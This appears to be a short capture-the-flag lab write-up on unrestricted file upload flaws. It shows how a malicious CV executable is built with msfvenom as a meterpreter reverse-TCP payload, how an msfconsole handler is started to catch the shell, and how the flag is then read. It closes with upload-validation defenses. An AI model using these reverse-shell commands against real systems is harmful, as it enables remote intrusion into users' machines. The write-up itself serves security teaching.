Unrestricted File Uploads

Almost every website provides the ability to upload files. If there is not input validation it can go really wrong.

Two possible paths:

  1. If the attacker can retrieve the uploaded file again it could lead to code execution, if the attacker uploads a webshell.
  2. If the file is later on viewed by a user, the attacker can embed malware that executes on the users browser.

When uploaded files are put in webroot, it is a whole other story, as for example a .net webserver would pick up these files if the ending is ASP, ASPX or CSHTML and serve it as resources.


In this case we can upload cv files which will then be reviewed by an employee.

This create a malicious CV: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT="Listening port" -f exe -o cv-username.exe malicious file

This will create a listener in msfconsole: listener

Set listening port to: 4444 As using attackBox, setting the LHOST to “eth0” sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 'listening port'; exploit"

Thats how it looks like when it worked. listener got shell

Now this will directly open a meterpreter session.


Then moving to the Documents folder of the elf user cd, ls

Then opening the flag with cat cat

secure development

To prevent such things we need to implement:

  • File Content Validation (Check Content-Type)
  • File Extension Validation (Whitelist extensions)
  • File Size Validation
  • File Renaming (Put random part into your new filename)
  • Malware Scanning
